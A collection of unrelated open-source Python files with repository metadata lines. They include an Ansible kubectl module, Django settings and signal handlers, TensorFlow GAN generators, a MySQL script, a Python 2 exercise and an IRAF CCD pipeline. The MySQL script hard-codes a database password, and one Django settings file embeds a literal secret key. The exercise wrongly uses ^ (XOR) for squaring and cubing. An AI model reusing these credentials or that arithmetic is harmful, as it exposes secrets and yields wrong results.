description:
- The path and filename of the resource(s) definition file(s).
- To operate on several files this can accept a comma separated list of files or a list of files.
aliases: [ 'files', 'file', 'filenames' ]
kubectl:
required: false
default: null
description:
- The path to the kubectl bin
namespace:
required: false
default: null
description:
- The namespace associated with the resource(s)
resource:
required: false
default: null
description:
- The resource to perform an action on. pods (po), replicationControllers (rc), services (svc)
label:
required: false
default: null
description:
- The labels used to filter specific resources.
server:
required: false
default: null
description:
- The url for the API server that commands are executed against.
force:
required: false
default: false
description:
- A flag to indicate to force delete, replace, or stop.
all:
required: false
default: false
description:
- A flag to indicate delete all, stop all, or all namespaces when checking exists.
log_level:
required: false
default: 0
description:
- Indicates the level of verbosity of logging by kubectl.
state:
required: false
choices: ['present', 'absent', 'latest', 'reloaded', 'stopped']
default: present
description:
- present handles checking existence or creating if definition file provided,
absent handles deleting resource(s) based on other options,
latest handles creating or updating based on existence,
reloaded handles updating resource(s) definition using definition file,
stopped handles stopping resource(s) based on other options.
requirements:
- kubectl
author: "Kenny Jones (@kenjones-cisco)"
"""
EXAMPLES = """
- name: test nginx is present
kube: name=nginx resource=rc state=present
- name: test nginx is stopped
kube: name=nginx resource=rc state=stopped
- name: test nginx is absent
kube: name=nginx resource=rc state=absent
- name: test nginx is present
kube: filename=/tmp/nginx.yml
- name: test nginx and postgresql are present
kube: files=/tmp/nginx.yml,/tmp/postgresql.yml
- name: test nginx and postgresql are present
kube:
files:
- /tmp/nginx.yml
- /tmp/postgresql.yml
"""
class KubeManager(object):
def __init__(self, module):
self.module = module
self.kubectl = module.params.get('kubectl')
if self.kubectl is None:
self.kubectl = module.get_bin_path('kubectl', True)
self.base_cmd = [self.kubectl]
if module.params.get('server'):
self.base_cmd.append('--server=' + module.params.get('server'))
if module.params.get('log_level'):
self.base_cmd.append('--v=' + str(module.params.get('log_level')))
if module.params.get('namespace'):
self.base_cmd.append('--namespace=' + module.params.get('namespace'))
self.all = module.params.get('all')
self.force = module.params.get('force')
self.name = module.params.get('name')
self.filename = [f.strip() for f in module.params.get('filename') or []]
self.resource = module.params.get('resource')
self.label = module.params.get('label')
def _execute(self, cmd):
args = self.base_cmd + cmd
try:
rc, out, err = self.module.run_command(args)
if rc != 0:
self.module.fail_json(
msg='error running kubectl (%s) command (rc=%d), out=\'%s\', err=\'%s\'' % (' '.join(args), rc, out, err))
except Exception as exc:
self.module.fail_json(
msg='error running kubectl (%s) command: %s' % (' '.join(args), str(exc)))
return out.splitlines()
def _execute_nofail(self, cmd):
args = self.base_cmd + cmd
rc, out, err = self.module.run_command(args)
if rc != 0:
return None
return out.splitlines()
def create(self, check=True, force=True):
if check and self.exists():
return []
cmd = ['apply']
if force:
cmd.append('--force')
if not self.filename:
self.module.fail_json(msg='filename required to create')
cmd.append('--filename=' + ','.join(self.filename))
return self._execute(cmd)
def replace(self, force=True):
cmd = ['apply']
if force:
cmd.append('--force')
if not self.filename:
self.module.fail_json(msg='filename required to reload')
cmd.append('--filename=' + ','.join(self.filename))
return self._execute(cmd)
def delete(self):
if not self.force and not self.exists():
return []
cmd = ['delete']
if self.filename:
cmd.append('--filename=' + ','.join(self.filename))
else:
if not self.resource:
self.module.fail_json(msg='resource required to delete without filename')
cmd.append(self.resource)
if self.name:
cmd.append(self.name)
if self.label:
cmd.append('--selector=' + self.label)
if self.all:
cmd.append('--all')
if self.force:
cmd.append('--ignore-not-found')
return self._execute(cmd)
def exists(self):
cmd = ['get']
if self.filename:
cmd.append('--filename=' + ','.join(self.filename))
else:
if not self.resource:
self.module.fail_json(msg='resource required without filename')
cmd.append(self.resource)
if self.name:
cmd.append(self.name)
if self.label:
cmd.append('--selector=' + self.label)
if self.all:
cmd.append('--all-namespaces')
cmd.append('--no-headers')
result = self._execute_nofail(cmd)
if not result:
return False
return True
# TODO: This is currently unused, perhaps convert to 'scale' with a replicas param?
def stop(self):
if not self.force and not self.exists():
return []
cmd = ['stop']
if self.filename:
cmd.append('--filename=' + ','.join(self.filename))
else:
if not self.resource:
self.module.fail_json(msg='resource required to stop without filename')
cmd.append(self.resource)
if self.name:
cmd.append(self.name)
if self.label:
cmd.append('--selector=' + self.label)
if self.all:
cmd.append('--all')
if self.force:
cmd.append('--ignore-not-found')
return self._execute(cmd)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(),
filename=dict(type='list', aliases=['files', 'file', 'filenames']),
namespace=dict(),
resource=dict(),
label=dict(),
server=dict(),
kubectl=dict(),
force=dict(default=False, type='bool'),
all=dict(default=False, type='bool'),
log_level=dict(default=0, type='int'),
state=dict(default='present', choices=['present', 'absent', 'latest', 'reloaded', 'stopped']),
),
mutually_exclusive=[['filename', 'list']]
)
changed = False
manager = KubeManager(module)
state = module.params.get('state')
if state == 'present':
result = manager.create(check=False)
elif state == 'absent':
result = manager.delete()
elif state == 'reloaded':
result = manager.replace()
elif state == 'stopped':
result = manager.stop()
elif state == 'latest':
result = manager.replace()
else:
module.fail_json(msg='Unrecognized state %s.' % state)
module.exit_json(changed=changed,
msg='success: %s' % (' '.join(result))
)
from ansible.module_utils.basic import * # noqa
if __name__ == '__main__':
main()
| insequent/kargo | library/kube.py | Python | apache-2.0 | 8,694 | 0.00161 |
'''
Created on 26/09/2014
@author: javgar119
'''
cluster_list =([Cluster(set([]), 0, 0, 1, 0),
Cluster(set([]), 1, 0, 1, 0)])
cluster_list2 = ([Cluster(set([]), 0, 0, 1, 0),
Cluster(set([]), 1, 0, 1, 0),
Cluster(set([]), 2, 0, 1, 0),
Cluster(set([]), 3, 0, 1, 0),
Cluster(set([]), 4, 0, 1, 0),
Cluster(set([]), 5, 0, 1, 0),
Cluster(set([]), 6, 0, 1, 0),
Cluster(set([]), 7, 0, 1, 0),
Cluster(set([]), 8, 0, 1, 0),
Cluster(set([]), 9, 0, 1, 0),
Cluster(set([]), 10, 0, 1, 0),
Cluster(set([]), 11, 0, 1, 0),
Cluster(set([]), 12, 0, 1, 0),
Cluster(set([]), 13, 0, 1, 0),
Cluster(set([]), 14, 0, 1, 0),
Cluster(set([]), 15, 0, 1, 0),
Cluster(set([]), 16, 0, 1, 0),
Cluster(set([]), 17, 0, 1, 0),
Cluster(set([]), 18, 0, 1, 0),
Cluster(set([]), 19, 0, 1, 0)])
expected = set([(1.0, 0, 1)])
expected2 = set([(1.0, 9, 10), (1.0, 2, 3), (1.0, 15, 16),
(1.0, 11, 12), (1.0, 13, 14), (1.0, 16, 17),
(1.0, 14, 15), (1.0, 12, 13), (1.0, 4, 5),
(1.0, 18, 19), (1.0, 3, 4), (1.0, 8, 9),
(1.0, 17, 18), (1.0, 6, 7), (1.0, 7, 8),
(1.0, 5, 6), (1.0, 10, 11), (1.0, 0, 1), (1.0, 1, 2)])
cluster_list3 = ([Cluster(set([]), 90.9548590217, -17.089022585, 1, 0),
Cluster(set([]), 90.2536656675, -70.5911544718, 1, 0),
Cluster(set([]), -57.5872347006, 99.7124028905, 1, 0),
Cluster(set([]), -15.9338519877, 5.91547495626, 1, 0),
Cluster(set([]), 19.1869055492, -28.0681513017, 1, 0),
Cluster(set([]), -23.0752410653, -42.1353490324, 1, 0),
Cluster(set([]), -65.1732261872, 19.675582646, 1, 0),
Cluster(set([]), 99.7789872101, -11.2619165604, 1, 0),
Cluster(set([]), -43.3699854405, -94.7349852817, 1, 0),
Cluster(set([]), 48.2281912402, -53.3441788034, 1, 0)])
expected3 = set([(10.5745166749, 0, 7)]) | JavierGarciaD/Algorithmic_Thinking | src/project_3_test_data.py | Python | gpl-3.0 | 2,503 | 0.003196 |
from rpitc.io import IO
class TestOut:
def test_init_on(self, gpio):
from rpitc.io.out import Out
out = Out(7, status=IO.ON)
assert out.status == IO.ON
out.off()
def test_set_pin(self, out):
assert out.set_pin(IO.ON) == IO.ON
def test_on(self, out):
out.on()
assert out.status == IO.ON
def test_off(self, out):
out.off()
assert out.status == IO.OFF
def test_toggle(self, out):
out.off()
out.toggle()
assert out.status == IO.ON
out.toggle()
assert out.status == IO.OFF
| stefan-walluhn/RPi.TC | tests/test_out.py | Python | gpl-3.0 | 607 | 0 |
import pytest
import watchmaker
@pytest.fixture
def setup_object():
pass
def test_main():
"""Placeholder for tests"""
# Placeholder
assert watchmaker.__version__ == watchmaker.__version__
| MarionTheBull/watchmaker | tests/test_watchmaker.py | Python | apache-2.0 | 209 | 0 |
import os
import threading
import time
from django.conf import settings
from django.db import connections
from django.dispatch import receiver
from django.test.signals import setting_changed
from django.utils import timezone
from django.utils.functional import empty
# Most setting_changed receivers are supposed to be added below,
# except for cases where the receiver is related to a contrib app.
@receiver(setting_changed)
def clear_cache_handlers(**kwargs):
if kwargs['setting'] == 'CACHES':
from django.core.cache import caches
caches._caches = threading.local()
@receiver(setting_changed)
def update_connections_time_zone(**kwargs):
if kwargs['setting'] == 'TIME_ZONE':
# Reset process time zone
if hasattr(time, 'tzset'):
if kwargs['value']:
os.environ['TZ'] = kwargs['value']
else:
os.environ.pop('TZ', None)
time.tzset()
# Reset local time zone cache
timezone.get_default_timezone.cache_clear()
# Reset the database connections' time zone
if kwargs['setting'] == 'USE_TZ' and settings.TIME_ZONE != 'UTC':
USE_TZ, TIME_ZONE = kwargs['value'], settings.TIME_ZONE
elif kwargs['setting'] == 'TIME_ZONE' and not settings.USE_TZ:
USE_TZ, TIME_ZONE = settings.USE_TZ, kwargs['value']
else:
# no need to change the database connnections' time zones
return
tz = 'UTC' if USE_TZ else TIME_ZONE
for conn in connections.all():
conn.settings_dict['TIME_ZONE'] = tz
tz_sql = conn.ops.set_time_zone_sql()
if tz_sql:
conn.cursor().execute(tz_sql, [tz])
@receiver(setting_changed)
def clear_serializers_cache(**kwargs):
if kwargs['setting'] == 'SERIALIZATION_MODULES':
from django.core import serializers
serializers._serializers = {}
@receiver(setting_changed)
def language_changed(**kwargs):
if kwargs['setting'] in ['LANGUAGES', 'LANGUAGE_CODE', 'LOCALE_PATHS']:
from django.utils.translation import trans_real
trans_real._default = None
trans_real._active = threading.local()
if kwargs['setting'] in ['LANGUAGES', 'LOCALE_PATHS']:
from django.utils.translation import trans_real
trans_real._translations = {}
trans_real.check_for_language.cache_clear()
@receiver(setting_changed)
def file_storage_changed(**kwargs):
file_storage_settings = [
'DEFAULT_FILE_STORAGE',
'FILE_UPLOAD_DIRECTORY_PERMISSIONS',
'FILE_UPLOAD_PERMISSIONS',
'MEDIA_ROOT',
'MEDIA_URL',
]
if kwargs['setting'] in file_storage_settings:
from django.core.files.storage import default_storage
default_storage._wrapped = empty
@receiver(setting_changed)
def root_urlconf_changed(**kwargs):
if kwargs['setting'] == 'ROOT_URLCONF':
from django.core.urlresolvers import clear_url_caches, set_urlconf
clear_url_caches()
set_urlconf(None)
@receiver(setting_changed)
def static_storage_changed(**kwargs):
if kwargs['setting'] in [
'STATICFILES_STORAGE',
'STATIC_ROOT',
'STATIC_URL',
]:
from django.contrib.staticfiles.storage import staticfiles_storage
staticfiles_storage._wrapped = empty
| dsanders11/django-future-staticfiles | tests/staticfiles_tests/signals.py | Python | bsd-3-clause | 3,301 | 0 |
# coding:utf-8
"""
Django settings for turbo project.
Generated by 'django-admin startproject' using Django 1.11.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import datetime
import os
import turbosettings.parameters as parameters
from turbosettings.generate_secret_key import secret_key_from_file
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_PATH = os.path.realpath(os.path.dirname(__file__))
USE_X_FORWARDED_HOST = False
FORCE_SCRIPT_NAME = ""
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = secret_key_from_file('secret_key')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'songwriter',
'corsheaders',
'debug_toolbar',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
ROOT_URLCONF = 'turbosettings.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': parameters.TEMPLATES_DIRS if parameters.TEMPLATES_DIRS else [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
],
'builtins': [
'django.templatetags.i18n',
'django.contrib.humanize.templatetags.humanize',
'django.contrib.staticfiles.templatetags.staticfiles',
],
},
},
]
WSGI_APPLICATION = 'turbosettings.wsgi.application'
CORS_ORIGIN_WHITELIST = [
'localhost:8080',
'127.0.0.1:8080',
]
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'fr'
TIME_ZONE = "Europe/Paris"
USE_I18N = True
USE_L10N = True
USE_TZ = True
gettext = lambda x: x
LANGUAGES = (
('fr', gettext('Français')),
('en', gettext('English')),
)
LOCALE_PATHS = (
os.path.join(BASE_DIR, 'locale/'),
)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = FORCE_SCRIPT_NAME + "/static/"
STATIC_ROOT = BASE_DIR + '/static/'
STATICFILES_DIRS = parameters.STATICFILES_DIRS if parameters.STATICFILES_DIRS else (
"assets/",
)
FIXTURE_DIRS = (
'fixtures/'
)
MEDIA_URL = '/'
MEDIA_ROOT = BASE_DIR + '/media/'
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
),
}
JWT_AUTH = {
'JWT_SECRET_KEY': secret_key_from_file('secret_key_jwt'),
'JWT_ALLOW_REFRESH': True,
'JWT_EXPIRATION_DELTA': datetime.timedelta(seconds=18000),
}
# For debug toolbar
INTERNAL_IPS = ["127.0.0.1"]
from turbosettings.settings_local import *
| giliam/turbo-songwriter | backend/turbosettings/settings.py | Python | mit | 4,924 | 0.001422 |
import tensorflow as tf
from tensorflow.python.keras.layers import Conv2D, Conv2DTranspose, Conv3D, Dense, Reshape
tfgan = tf.contrib.gan
def basic_generator(noise):
"""Simple generator to produce MNIST images.
Args:
noise: A single Tensor representing noise.
Returns:
A generated image in the range [-1, 1].
"""
channels_after_reshape = 256
net = Dense(1024, activation='elu')(noise)
net = Dense(7 * 7 * channels_after_reshape, activation='elu')(net)
net = Reshape([7, 7, channels_after_reshape])(net)
net = Conv2DTranspose(64, kernel_size=4, strides=2, padding="same", activation='elu')(net)
net = Conv2DTranspose(32, kernel_size=4, strides=2, padding="same", activation='elu')(net)
# Make sure that generator output is in the same range as `inputs`
# ie [-1, 1].
net = Conv2D(1, kernel_size=4, activation = 'tanh', padding='same')(net)
return net
def conditional_generator(inputs):
"""Generator to produce MNIST images.
Args:
inputs: A 2-tuple of Tensors (noise, one_hot_labels).
Returns:
A generated image in the range [-1, 1].
"""
noise, one_hot_labels = inputs
channels_after_reshape = 128
net = Dense(1024, activation='elu')(noise)
net = tfgan.features.condition_tensor_from_onehot(net, one_hot_labels)
net = Dense(7 * 7 * channels_after_reshape, activation='elu')(net)
net = Reshape([7, 7, channels_after_reshape])(net)
net = Conv2DTranspose(64, kernel_size=4, strides=2, padding="same", activation='elu')(net)
net = Conv2DTranspose(32, kernel_size=4, strides=2, padding="same", activation='elu')(net)
# Make sure that generator output is in the same range as `inputs`
# ie [-1, 1].
net = Conv2D(1, kernel_size=4, activation = 'tanh', padding='same')(net)
return net
def encoder_decoder_generator(start_img):
"""
"""
layer1 = Conv2D(64, kernel_size=4, strides=2, activation='elu', padding='same')(start_img)
layer2 = Conv2D(64, kernel_size=4, strides=2, activation='elu', padding='same')(layer1)
layer3 = Conv2D(64, kernel_size=4, strides=1, activation='elu', padding='same')(layer2)
layer4 = Conv2DTranspose(64, kernel_size=4, strides=2, activation='elu', padding="same")(layer3)
layer5 = Conv2DTranspose(64, kernel_size=4, strides=2, activation='elu', padding="same")(layer4)
layer6 = Conv2D(64, kernel_size=2, strides=1, activation='elu', padding='same')(layer5)
# Make sure that generator output is in the same range as `inputs`
# ie [-1, 1].
net = Conv2D(3, kernel_size=1, activation = 'tanh', padding='same')(layer6)
return net
| bgroveben/python3_machine_learning_projects | learn_kaggle/deep_learning/packages/learntools/gans/generators.py | Python | mit | 2,657 | 0.007151 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Robin Wen
# Date: 2014-11-18
# Desc: Connect to MySQL using MySQLdb package, and insert test data.
import MySQLdb as mdb
con = mdb.connect(host='10.10.3.121', user='robin', passwd='robin89@DBA', db='testdb', unix_socket='/tmp/mysql5173.sock', port=5173)
with con:
cur = con.cursor()
cur.execute("DROP TABLE IF EXISTS Writers")
cur.execute("CREATE TABLE Writers(Id INT PRIMARY KEY AUTO_INCREMENT, \
Name VARCHAR(25))")
cur.execute("INSERT INTO Writers(Name) VALUES('Jack London')")
cur.execute("INSERT INTO Writers(Name) VALUES('Honore de Balzac')")
cur.execute("INSERT INTO Writers(Name) VALUES('Lion Feuchtwanger')")
cur.execute("INSERT INTO Writers(Name) VALUES('Emile Zola')")
cur.execute("INSERT INTO Writers(Name) VALUES('Truman Capote')")
con.close()
| dbarobin/pytools | py-practice/insert_data.py | Python | gpl-2.0 | 868 | 0.002304 |
#import factorial
#import square
x = int(raw_input("What is 'x'?\n"))
y = int(raw_input("What is y?\n"))
# question0 = str(raw_input("Define a y value? (y/n)\n"))
# if (question0 == "y","Y","yes","Yes"):
# y = int(raw_input("What will 'y' be?\n"))
# elif (y == "n","N","no","No"):
# question2 = str(raw_input("Is y = 10 ok?\n"))
# if (question2 == "y","Y","yes","Yes"):
# y = 10
# elif (question2 == "n","N","no","No"):
# y = int(raw_input("What will 'y' be?\n"))
# else:
# print "Please insert and interger"
# else:
# print "Please insert an interger."
print "Using that information, we can do some mathematical equations."
if x > y: #is not None:
print "x, %d, is greater than y, %d." % (x, y)
elif x == y: #is not None:
print "x, %d, is equal to y, %d." % (x, y)
elif x < y: #is not None:
print "x, %d, is less than y, %d." % (x, y)
elif x is not int:
print "x should be a interger, you put it as %d" % (x)
elif x is None:
print "Please rerun the code."
else:
print "Something went wrong!"
add = (x + y)
sub = (x - y)
mult = (x * y)
div = (x / y)
rem = (x % y)
xeven = (x % 2 == 0)
xodd = (x % 2 != 0)
yeven = (y % 2 == 0)
yodd = (y % 2 != 0)
# xfact = (factorial(x))
# yfact = (factorial(y))
print "If you add x and y, you'll get %s." % add
print "If you subtract x and y, you'll get %s." % sub
print "If you multiply x and y, you'll get %s." % mult
print "If you divide x and y, you'll get %s, with a remainder of %s." % (div, rem)
if (x % 2 == 0):
print "x is even."
if (x % 2 != 0):
print "x is odd."
if (y % 2 == 0):
print "y is even."
if (y % 2 != 0):
print "y is odd."
print "If you square x, you get %s, and y squared is %s." % ((x^2),(y^2))
print "If you cube x, you get %s, and y cubed is %s." % ((x^3), (y^3))
#print "If you take x factorial, you get %s, and y factorial is %s." % ((xfact), (yfact))
#print "The square root of x is %s, and the square root of y is %s." % (square(x), square(y))
print ""
# from sys import argv
# import random
# value = (1,2,3,4,5,6)
# roll, string = argv
# def choice(roll):
# random.choice(dice)
# return choice
# choice(roll)
# dice = choice(value) | chrisortman/CIS-121 | k0459866/Lessons/ex12.py | Python | mit | 2,216 | 0.009928 |
import pygame
import sys
from psistatsrd.app import App
def create_queue_row(data, config):
mem_graph = create_mem_graph(config)
cpu_graph = create_cpu_graph(config)
scroll_text = []
title = []
if type(data['ipaddr']).__name__ == "list":
scroll_text = scroll_text + data['ipaddr']
else:
scroll_text = [data['ipaddr']]
scroller = create_scroller(scroll_text, config)
row = create_row(config)
row.host = data['hostname']
row.add_drawable('scroller', scroller, App.DRAW_EVENT)
row.add_drawable('cpu', cpu_graph, App.POLL_EVENT)
row.add_drawable('mem', mem_graph, App.POLL_EVENT)
return row
def create_row(config):
row = StatRow(
border_width=int(config['statrow.border_width']),
border_color=config['statrow.border_color'],
height=int(config['statrow.height']),
width=int(config['statrow.width']),
bgcolor=config['statrow.bgcolor'],
title_font_size=int(config['statrow.title_font_size']),
title_font_aa=config['statrow.title_font_aa'],
title_font=config['statrow.title_font'],
title_color=config['statrow.title_color'],
)
return row
def create_scroller(scroll_text, config):
s = Scroller(
scroll_speed = float(config['scroller.scroll_speed']),
scroll_delay = int(config['scroller.scroll_delay']),
scroll_pause = int(config['scroller.scroll_pause']),
text_font = config['scroller.font.name'],
text_aa = config['scroller.font.aa'],
text_size = int(config['scroller.font.size']),
width = int(config['scroller.width']),
height = int(config['scroller.height']),
color=config['scroller.color'],
bgcolor=config['scroller.bgcolor'],
text_lines=scroll_text
)
return s
def create_resource_graph(key, config):
g = Graph2(
height=int(config['graph.%s.height' % key]),
width=int(config['graph.%s.width' % key]),
line_width=int(config['graph.%s.line_width' % key]),
color=config['graph.%s.color' % key],
bgcolor=config['graph.%s.bgcolor' % key],
line_aa=config['graph.%s.line_aa' % key]
)
max_color = 'graph.%s.max_color' % key
min_color = 'graph.%s.min_color' % key
if max_color in config:
g.max_color = config[max_color]
if min_color in config:
g.min_color = config[min_color]
return g
def create_cpu_graph(config):
return create_resource_graph('cpu', config)
def create_mem_graph(config):
return create_resource_graph('mem', config)
from psistatsrd.app import App
from psistatsrd.graph2 import Graph2
from psistatsrd.scroller import Scroller
from psistatsrd.statrow import StatRow
| alex-dow/psistatsrd | psistatsrd/utils/drawable.py | Python | mit | 2,757 | 0.009068 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# pipeline.py
# AstroObject
#
# Created by Alexander Rudy on 2012-04-25.
# Copyright 2012 Alexander Rudy. All rights reserved.
#
u"""
Basic CCD Reduction Pipeline written with AstroObject
"""
# Python Imports
import shutil
import os
import collections
# Numpy Imports
import numpy as np
# Package Resources Imports
from pkg_resources import resource_filename
# PyRAF Imports
from pyraf import iraf
from iraf import imred, ccdred
from AstroObject.simulator import Simulator
from AstroObject.simulator import (
optional,
description,
include,
replaces,
depends,
excepts,
collect,
ignore,
help
)
from AstroObject.image import ImageStack
from AstroObject.iraftools import UseIRAFTools
from AstroObject.loggers import logging
ImageStack = UseIRAFTools(ImageStack)
class Pipeline(Simulator):
"""A task manager for the RC Pipeline"""
def __init__(self):
super(Pipeline, self).__init__(commandLine=True,name="Example Pipeline",version="1.0")
self.config.load(resource_filename(__name__,"Defaults.yaml"))
self.config.setFile("Main")
self.config.load()
self.collect()
@ignore #Don't load this method as a stage... it is a helper method used to implement other stages.
def load_type(self,key,stack):
"""Load a specific type of files using a generalized loading procedure"""
if isinstance(self.config[key]["Files"],collections.Sequence):
ReadStates = []
for filename in self.config[key]["Files"]:
ReadStates += stack.read(filename)
self.log.debug("Loaded %s: %s" % (key,filename))
return ReadStates
else:
self.log.error("No %s files are given." % key)
raise IOError("No %s files are given." % key)
def load_bias(self):
"""Loading Raw Bias Frames"""
# Load individual bias frames.
self.bias = ImageStack()
self.load_type("Bias",self.bias)
# Set Header Values for each image.
for frame in self.bias.values():
frame.header.update('IMAGETYP','zero')
self.log.debug("Set IMAGETYP=zero for frame %s" % frame)
self.log.debug("Set Header IMAGETYP=zero for frames %r" % self.bias.list())
def load_dark(self):
"""Loading Dark Frames"""
# Load individual bias frames.
self.dark = ImageStack()
self.load_type("Dark",self.dark)
# Set Header Values for each image.
for frame in self.dark.values():
frame.header.update('IMAGETYP','dark')
self.log.debug("Set IMAGETYP=dark for frame %s" % frame)
self.log.debug("Set Header IMAGETYP=dark for frames %r" % self.dark.list())
def load_flat(self):
"""Loading Dark Frames"""
# Load individual bias frames.
self.flat = ImageStack()
self.load_type("Flat",self.flat)
# Set Header Values for each image.
for frame in self.flat.values():
frame.header.update('IMAGETYP','flat')
self.log.debug("Set IMAGETYP=flat for frame %s" % frame)
self.log.debug("Set Header IMAGETYP=flat for frames %r" % self.dark.list())
@help("Create bias frames from the configured bias list.")
@depends("load-bias") # Declare a dependency on another stage: Method ``load_bias()``.
def create_bias(self):
"""Creating Combined Bias Frame"""
self.log.debug("Running iraf.zerocombine on image list...")
iraf.unlearn(iraf.zerocombine)
iraf.zerocombine(self.bias.iinat(),
output=self.bias.iout("Bias"),
combine=self.config["Bias.Combine"],
ccdtype="zero",
reject=self.config["Bias.Reject"],
scale="none", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1."
)
self.bias.idone()
@help("Create Dark Frames")
@depends("load-dark")
def create_dark(self):
"""Creating Combined Dark Frame"""
self.log.debug("Running iraf.darkcombine on image list...")
iraf.unlearn(iraf.darkcombine)
iraf.darkcombine(self.dark.iraf.inatfile(),
output=self.dark.iraf.outfile("Dark"),
combine=self.config["Dark.Combine"],
ccdtype="dark",
reject=self.config["Dark.Reject"],
process="no", scale="exposure", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1."
)
self.dark.iraf.done()
@help("Create Flat Frames")
@depends("load-flat")
def create_flat(self):
"""Creating Combined Flat Frame"""
self.log.debug("Runnign iraf.flatcombine on image list...")
iraf.unlearn(iraf.flatcombine)
iraf.flatcombine(self.flat.iraf.inatfile(),
output=self.flat.iraf.outfile("Flat"),
combine=self.config["Flat.Combine"],
ccdtype="flat",
reject=self.config["Flat.Reject"],
scale=self.config["Flat.Scale"],
process="no", subsets="no", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1.")
self.flat.iraf.done()
def load_data(self):
"""Loading Raw Data into the system."""
self.data = ImageStack()
self.load_type("Data",self.data)
@include # Set this stage as something to be run with the *all macro.
@depends("create-bias","load-data")
@help("Subtract Bias Frame")
def subtract_bias(self):
"""Subtracting Bias Frame"""
iraf.unlearn(iraf.ccdproc)
iraf.ccdproc(self.data.iraf.modatfile(),
ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="yes", darkcor="no", flatcor ="no",
zero=self.bias.iin("Bias"))
self.data.idone()
@include # Set this stage as something to be run with the *all macro.
@depends("create-dark","load-data")
@help("Subtract Dark Frame")
def subtract_dark(self):
"""Subtracting Dark Frame"""
iraf.unlearn(iraf.ccdproc)
iraf.ccdproc(self.data.iraf.modatfile(),
ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="no", darkcor="yes", flatcor ="no",
dark=self.dark.iin("Dark"))
self.data.idone()
@include # Set this stage as something to be run with the *all macro.
@depends("create-flat","load-data")
@help("Divide out flat frame")
def divide_flat(self):
"""Dividing by Flat Frame"""
iraf.unlearn(iraf.ccdproc)
iraf.ccdproc(self.data.iraf.inatfile(),
output=self.data.iraf.outatfile(append="-Flat"),
flat=self.flat.iin("Flat"),
ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="no", flatcor="yes", darkcor ="no")
self.data.iraf.done()
# Since the simulator loads and runs stages in order, this stage will always
# be run last.
@include # Set this stage as something to be run with the *all macro.
@depends("load-data")
def save_file(self):
"""Save the new fits file"""
self.data.write("DataFile.fits",frames=[self.data.framename],clobber=True)
@help("Save Partial Images")
@depends("create-flat","create-dark","create-bias")
def save_partials(self):
"""Saving partial images"""
self.bias.write(frames=["Bias"],filename=self.config["Bias.Master"],clobber=True)
self.dark.write(frames=["Dark"],filename=self.config["Dark.Master"],clobber=True)
self.flat.write(frames=["Flat"],filename=self.config["Flat.Master"],clobber=True)
def main():
pipeline = Pipeline()
pipeline.run()
if __name__ == '__main__':
main()
| alexrudy/AstroObject | Examples/pipeline.py | Python | gpl-3.0 | 7,924 | 0.016406 |
"""
Django settings for todo project.
Generated by 'django-admin startproject' using Django 1.9.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-b9xx8+eul3#8q&c@tv^5e!u66j=a6@377$y^b2q!0a%vj+!ny'
